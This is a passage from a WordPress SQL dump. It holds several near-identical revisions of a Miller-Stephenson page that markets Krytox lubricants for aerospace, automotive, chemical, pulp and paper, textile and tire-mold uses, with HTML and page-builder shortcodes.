levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:41:58', '2016-09-28 19:41:58', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2124, 2, '2016-09-28 19:42:45', '2016-09-28 19:42:45', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n\r\n<a name="aerospace">\r\n<strong>Aerospace, Aviation, and National Defense</strong></a>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:</li>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Food Processing</strong>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Medical Industry Equipment Applications </strong>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry • H-1 food grade oils and greases available Krytox works in a variety of applications: • Oxygen systems and respirators • Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Metal Processing </strong>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Oxygen and Reactive Gas Service </strong>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Chemours offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Power Generation</strong>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Pulp and Paper</strong>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment uptime and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-28 19:42:45', '2016-09-28 19:42:45', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2125, 2, '2016-09-28 19:43:52', '2016-09-28 19:43:52', '[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#bearings">Tire Mold</a>\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Industries and Applications</strong></span>\r\n<BR><BR>\r\n<a name="aerospace">\r\n<strong>Aerospace, Aviation, and National Defense</strong></a>\r\n<ul>\r\n 	<li>Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</li>\r\n 	<li>Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purposeformulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing • Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space • Excellent frictional properties for long wear and low energy consumption • Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Automotive—Squeak and Rattle</strong>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather-onleather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Automotive—Mechanical Systems</strong>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided stateof-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh underhood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Underhood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, antilock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<strong>Chemical and Petrochemical</strong>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Box Board Corrugating</strong>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Electronics/Semiconductor</strong>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production 